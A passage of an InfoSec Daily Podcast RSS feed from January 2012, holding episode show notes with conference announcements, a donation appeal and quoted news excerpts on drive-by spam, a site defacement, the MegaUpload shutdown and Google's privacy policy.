<p><b><span>What the sensor might be used for is anybody&#039;s guess. The </span><a href="http://arstechnica.com/business/news/2011/10/kinect-for-windows-sdk-going-commercial-in-early-2012.ars"><span>Kinect for Windows</span></a><span>&mdash;a version of the Xbox 360 accessory with revised firmware to support close-up operation&mdash;will be released in </span><a href="http://arstechnica.com/microsoft/news/2012/01/ballmers-bow-at-ces-short-on-surprises-except-for-that-tweet-choir.ars"><span>February</span></a><span>, and with that, third-party applications that use the sensor will start to arrive. Windows 8 might even include direct support for Kinect-powered features: documents </span><a href="http://www.neowin.net/news/microsoft-details-early-windows-8-improvements-to-oems"><span>leaked in 2010</span></a><span> hinted at Kinect integration with automatic user switching using face detection.</span></b></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Source: </span><a href="http://www.darkreading.com/security/attacks-breaches/232500660/new-drive-by-spam-infects-those-who-open-email-no-attachment-needed.html"><span>http://www.darkreading.com/security/attacks-breaches/232500660/new-drive-by-spam-infects-those-who-open-email-no-attachment-needed.html</span></a></b></p>
<p><b><br />
		</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Attackers have developed a new way to infect your PC through email &#8212; without forcing you to click on an attachment.</span></b></p>
<p><b><br />
		<span>According to researchers at eleven, a German security firm, the new drive-by spam automatically downloads malware when am email is opened in the email client. The user doesn&#039;t have to click on a link or open an attachment &#8212; just opening the email is enough.</span></b></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Source: </span><a href="http://blog.hacktalk.net/how-to-do-it-wrong/"><span>http://blog.hacktalk.net/how-to-do-it-wrong/</span></a></b></p>
<p><b><br />
		</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>As I&rsquo;m sure many of you HackTalkers have read, UFC.com was recently defaced which led to Dana White essentially daring Anonymous to do it again.</span></b></p>
<p><b><br />
		<span>I see stuff like this time and time again, a hacking forum will get pwned by some group and after picking up the pieces, the site which got hacked will talk crap about their attackers and essentially dare them to try it again. Inevitably the site will be hacked again because the administrators of the site are still leaving gaping security holes in their site. This is something that has been done time and time again.</span></b></p>
<p><b><span>This doesn&rsquo;t relate only to hacking either. In pretty much every walk of life, if someone kicked your ass once you can be certain they can do it again, especially if you egg them on.</span></b></p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-580-weekend-wrap-up-with-dr-b0n3z/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3424/0/infosec-daily-podcast-episode-580.mp3" length="18977148" type="audio/mpeg" />
		<itunes:duration>0:39:32</itunes:duration>
		<itunes:subtitle>Episode 580 &#8211; Weekend Wrap-up with Dr. b0n3z
InfoSec Daily Podcast Episode 580 for January 28, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez.
&#160;
Guests: frontpage, connection, oncee, spridel
&#160;
Announcements:
Unsung Heros
H[...]</itunes:subtitle>
		<itunes:summary>Episode 580 &#8211; Weekend Wrap-up with Dr. b0n3z
InfoSec Daily Podcast Episode 580 for January 28, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez.
&#160;
Guests: frontpage, connection, oncee, spridel
&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

		Information Security Blogger Awards 2012
		Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on http://www.ashimmy.com.
Brad Smith (theNurse)
		We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
http://www.social-engineer.org/brad-smith-updates/
		http://www.social-engineer.org/bradsmithdonation/
Schmoocon Epilogue
		When: After Schmoocon
		Where: Washington, DC
		Hit up anyone in NOVA Hackers
Metasploit Framework Unleashed Cincinnati
		When: February 11, 2012. 
		Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
		https://msfucincy.wordpress.com/
		$20 donation for #HFC
Social Engineering Training
		When: March 5-9, 2012
		
Where: Seattle, Washington
		When: July 21-24, 2012
		
Where: Black Hat Vegas
		When: August 20-24, 2012
		Where: &#160;Bristol, UK
		When: &#160;November 12-16, 2012
		
Where: &#160;Columbia, MD 
		http://www.social-engineer.com/social-engineer-training
Linuxfest Northwest 2012
		When: Saturday, April 28th-29th, 2012
		Where: Bellingham Technical College &#8211; Bellingham, WA
		http://www.linuxfestnorthwest.org/
		CFP now open!
AIDE 2012
		When: May 21-25, 2012
		Where: MU Forensic Science Center
		Huntington, West Virginia 
		http://aide.marshall.edu
		CFP closes March 30!
LayerOne 2012
		When: May 26-27, 2012
		Where: Clarion Hotel &#8211; Anaheim, CA
		http://www.layerone.org
		CFP now open!
DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
		When: &#160;September 27-30, 2012
		Where: Louisville, KY
		http://www.derbycon.com
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Pentest Lessons:
Adam Compton &#38; Zac Wagle&#039;s should get credit for the &#34;Pentest Lessons&#34; idea. They also started a twitter account: https://twitter.com/pentestlessons.

		
Lesson 1: If you are beginning to freelance, make sure you have solid contracts and have a lawyer read the contract drafts. &#160;Core released some boilerplate examples about a year ago that are floating around on the internet available to freely use. &#160;Also, when you talk to a lawyer, don&#8217;t make small talk. &#160;The rates they charge make pentesters look like a bunch of chumps, and they charge for every minute you have their attentio[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 579 &#8211; Dude, Where’s My Porn?, Please Pass the Tinfoil, Virus Inception: Birth of Skynet, Spamvertisement Squatnet &amp; All Your DoD Are Belong To Us</title>
		<link>http://www.isdpodcast.com/episode-579-dude-wheres-my-porn-please-pass-the-tinfoil-virus-inception-birth-of-skynet-spamvertisement-squatnet-all-your-dod-are-belong-to-us</link>
		<comments>http://www.isdpodcast.com/episode-579-dude-wheres-my-porn-please-pass-the-tinfoil-virus-inception-birth-of-skynet-spamvertisement-squatnet-all-your-dod-are-belong-to-us#comments</comments>
		<pubDate>Sat, 28 Jan 2012 02:03:09 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3419</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 579 for January 27, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez. &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 579 for January 27, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heros</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hit up anyone in NOVA Hackers</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;The Reunion&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="https://torrentfreak.com/megaupload-users-plan-to-sue-the-fbi-over-lost-files-120126/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://torrentfreak.com/megaupload-users-plan-to-sue-the-fbi-over-lost-files-120126/</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In most reports following the MegaUpload shutdown, the site is exclusively portrayed as a piracy haven.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">However, hundreds of thousands, perhaps millions of people used the site to share research data, work documents, personal video collections.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As of today, these people are still unsure whether they will ever get their personal belongings back.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a response, Pirate Parties worldwide have started to make a list of all the people affected by the raids, and they are planning to file an official complaint against the US authorities.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;The widespread damage caused by the sudden closure of Megaupload is unjustified and completely disproportionate to the aim intended,&rdquo; they announce.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;For this reason Pirates of Catalonia, in collaboration with Pirate Parties International and other Pirate Parties, have begun investigating these potential breaches of law and will facilitate submission of complaints against the US authorities in as many countries as possible, to ensure a positive and just result.&rdquo; </span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="https://billmullins.wordpress.com/2012/01/26/googles-new-policy-whats-the-problem-why-the-outrage/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://billmullins.wordpress.com/2012/01/26/googles-new-policy-whats-the-problem-why-the-outrage/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As a long standing vocal opponent of Google&rsquo;s invasive practices &ndash; and, having not stood on the sideline as the Octopus spread its tentacles &ndash; I now find myself in the uncomfortable position of defending the indefensible &ndash; those same overreaching and invasive practices.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In yesterday&rsquo;s presumptuous announcement, Google explained its new policy &ndash; with just the right amount of deceptive glitter -</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;"> a customer care focus.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Our new policy reflects a single product experience that does what you need, when you want it to &ndash; &hellip;&hellip;. reflecting our desire to create one beautifully simple and intuitive experience across Google.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A bit of a twist on reality, I should think.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The reality being of course &ndash; Google has always</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">viewed </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">you as the product</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &ndash; </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">not</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, the customer. Yes, you the user &ndash; are a product. The customers (no, not you), are the companies that buy the targeted advertising that is directed </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">to you</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. It&rsquo;s hardly news that Google generates its revenue through targeted advertising &ndash; directed at you.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
